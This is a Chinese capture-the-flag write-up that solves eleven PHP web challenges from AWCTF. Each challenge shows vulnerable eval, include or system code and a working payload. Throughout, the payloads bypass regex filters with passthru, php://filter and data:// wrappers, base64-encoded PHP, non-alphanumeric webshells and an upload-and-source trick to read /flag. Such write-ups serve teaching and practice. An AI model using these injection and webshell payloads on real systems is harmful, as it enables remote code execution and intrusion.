AWCTF-Web部分题解
作者:互联网
AWCTF--web
web1
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
c=system("cd%20..;cd%20..;cd%20..;ls;cat%20f?ag");
web2
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤了system用同类函数passthru替换
c=passthru("cd%20..;cd%20..;cd%20..;ls;cat%20f?ag");
web3
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
c=eval($_GET[1]);&1=system("cd%20..;cd%20..;cd%20..;ls;cat%20flag");
web4
又过滤了` ; echo (
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=/flag
web5
<?php
//flag in /flag
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
// echo $flag;
}
}else{
highlight_file(__FILE__);
}
文件包含,使用data伪协议执行命令,因为过滤了flag,所以?绕过,
?c=data://text/plain,<?php%20system("cat%20/fla?")?>
web6
<?php
// flag in /flag
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
// echo $flag;
}
}else{
highlight_file(__FILE__);
}
对php过滤了,用base64绕过
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg==
web7(还没做出来)
<?php
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\锛坾\锛墊\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
参见https://www.freebuf.com/articles/web/261800.html
print_r(scandir(next(scandir(getcwd()))));读取上一级www目录
print_r(scandir(dirname(getcwd())));同上
print_r(scandir(next(scandir(dirname(chdir(dirname(getcwd())))))));读取var目录
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));随机读取目录
web8
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
system($c." >/dev/null 2>&1");
}else{
highlight_file(__FILE__);
}
/dev/null 2>&1主要意思是不进行回显的意思,具体参见https://www.cnblogs.com/tinywan/p/6025468.html
?c=cat /flag;
web9
<?php
highlight_file(__FILE__);
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
if(preg_match('/[a-z0-9]/is',$_GET['shell'])){
echo "hacker!!!";
}else{
eval($_GET['shell']);
}
?>
无字母数字的webshell
参见https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
?shell=$_="{{{"^"?<>/";${$}[](${$}[__]);&=assert&__=print_r(scandir('/'))`
?shell=$_="{{{"^"?<>/";${$}[]();&_=phpinfo`
?shell=$__=('>'>'<')+('>'>'<');$_=$__/$__;$____='';$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});$_=$$_____;$____($_[$__]); [post data] 2=system("cat /flag");
web10
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
贴大佬文章https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html
通过post一个文件,在上传的过程中,通过.(点)去执行执行这个文件。
新建一个页面来向靶机post数据
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://49.232.149.138:10031/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
上传的文件为
#!/bin/sh cat /flag
最后构造poc?c=.+/???/????????[@-[](后面的[@-[]是linux下面的匹配符,是进行匹配的大写字母。)
执行获得flag(每次上传的文件不一定有大写的文件名,需要多上传几次)
web11
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
做法同上
标签:__,cd%,www,20,..,Web,题解,AWCTF,scandir 来源: https://www.cnblogs.com/chenxianz/p/14341238.html